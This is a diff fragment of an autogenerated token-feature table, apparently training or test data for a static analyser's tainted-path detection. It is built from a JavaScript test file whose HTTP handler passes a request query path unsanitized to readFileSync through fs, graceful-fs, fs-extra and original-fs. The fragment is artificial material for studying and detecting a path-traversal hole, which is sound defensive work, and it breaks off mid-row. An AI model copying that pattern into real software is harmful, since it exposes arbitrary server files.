autogenerated/TaintedPath/other-fs-libraries.js:13:11:13:22 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:13:24:13:27 | path | CalleeFlexibleAccessPath | fsExtra.readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:13:24:13:27 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:13:24:13:27 | path | calleeImports | fs-extra | @@ -9865,6 +80267,31 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:13:24:13:27 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:13:24:13:27 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:13:24:13:27 | path | receiverName | fsExtra | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:12 | originalFs | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:12 | originalFs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:12 | originalFs | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:12 | originalFs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:12 | originalFs | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:25 | origina ... ileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:25 | origina ... ileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:25 | origina ... ileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:25 | origina ... ileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:25 | origina ... ileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | exceptional return of origina ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | exceptional return of origina ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | exceptional return of origina ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | exceptional return of origina ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | exceptional return of origina ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | origina ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | origina ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | origina ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | origina ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:14:3:14:31 | origina ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:14:14:14:25 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:14:14:14:25 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:14:14:14:25 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:14:14:14:25 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:14:14:14:25 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:14:27:14:30 | path | CalleeFlexibleAccessPath | originalFs.readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:14:27:14:30 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:14:27:14:30 | path | calleeImports | original-fs | @@ -9874,6 +80301,48 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:14:27:14:30 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:14:27:14:30 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:14:27:14:30 | path | receiverName | originalFs | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:13 | getFsModule | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:13 | getFsModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:13 | getFsModule | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:13 | getFsModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:13 | getFsModule | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | exceptional return of getFsModule(true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | exceptional return of getFsModule(true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | exceptional return of getFsModule(true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | exceptional return of getFsModule(true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | exceptional return of getFsModule(true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | getFsModule(true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | getFsModule(true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | getFsModule(true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | getFsModule(true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:19 | getFsModule(true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:32 | getFsMo ... ileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:32 | getFsMo ... ileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:32 | getFsMo ... ileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:32 | getFsMo ... ileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:32 | getFsMo ... ileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | exceptional return of getFsMo ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | exceptional return of getFsMo ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | exceptional return of getFsMo ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | exceptional return of getFsMo ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | exceptional return of getFsMo ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | getFsMo ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | getFsMo ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | getFsMo ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | getFsMo ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:16:3:16:38 | getFsMo ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:16:15:16:18 | true | CalleeFlexibleAccessPath | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:16:15:16:18 | true | InputArgumentIndex | 0 | +| autogenerated/TaintedPath/other-fs-libraries.js:16:15:16:18 | true | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:15:16:18 | true | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:15:16:18 | true | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:16:15:16:18 | true | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:16:15:16:18 | true | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:16:21:16:32 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:21:16:32 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:16:21:16:32 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:16:21:16:32 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:16:21:16:32 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:16:34:16:37 | path | CalleeFlexibleAccessPath | getFsModule().readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:16:34:16:37 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:16:34:16:37 | path | contextFunctionInterfaces | getFsModule(special) | @@ -9881,6 +80350,48 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:16:34:16:37 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:16:34:16:37 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:16:34:16:37 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:13 | getFsModule | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:13 | getFsModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:13 | getFsModule | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:13 | getFsModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:13 | getFsModule | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | exceptional return of getFsModule(false) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | exceptional return of getFsModule(false) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | exceptional return of getFsModule(false) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | exceptional return of getFsModule(false) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | exceptional return of getFsModule(false) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | getFsModule(false) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | getFsModule(false) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | getFsModule(false) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | getFsModule(false) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:20 | getFsModule(false) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:33 | getFsMo ... ileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:33 | getFsMo ... ileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:33 | getFsMo ... ileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:33 | getFsMo ... ileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:33 | getFsMo ... ileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | exceptional return of getFsMo ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | exceptional return of getFsMo ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | exceptional return of getFsMo ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | exceptional return of getFsMo ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | exceptional return of getFsMo ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | getFsMo ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | getFsMo ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | getFsMo ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | getFsMo ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:17:3:17:39 | getFsMo ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:17:15:17:19 | false | CalleeFlexibleAccessPath | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:17:15:17:19 | false | InputArgumentIndex | 0 | +| autogenerated/TaintedPath/other-fs-libraries.js:17:15:17:19 | false | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:15:17:19 | false | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:15:17:19 | false | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:17:15:17:19 | false | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:17:15:17:19 | false | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:17:22:17:33 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:22:17:33 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:17:22:17:33 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:17:22:17:33 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:17:22:17:33 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:17:35:17:38 | path | CalleeFlexibleAccessPath | getFsModule().readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:17:35:17:38 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:17:35:17:38 | path | contextFunctionInterfaces | getFsModule(special) | @@ -9888,6 +80399,51 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:17:35:17:38 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:17:35:17:38 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:17:35:17:38 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:9 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:9 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:9 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:9 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:9 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | exceptional return of require ... odule") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | exceptional return of require ... odule") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | exceptional return of require ... odule") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | exceptional return of require ... odule") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | exceptional return of require ... odule") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | require ... odule") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | require ... odule") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | require ... odule") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | require ... odule") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:27 | require ... odule") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:35 | require ... require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:35 | require ... require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:35 | require ... require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:35 | require ... require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:35 | require ... require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | exceptional return of require ... e(true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | exceptional return of require ... e(true) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | exceptional return of require ... e(true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | exceptional return of require ... e(true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | exceptional return of require ... e(true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp 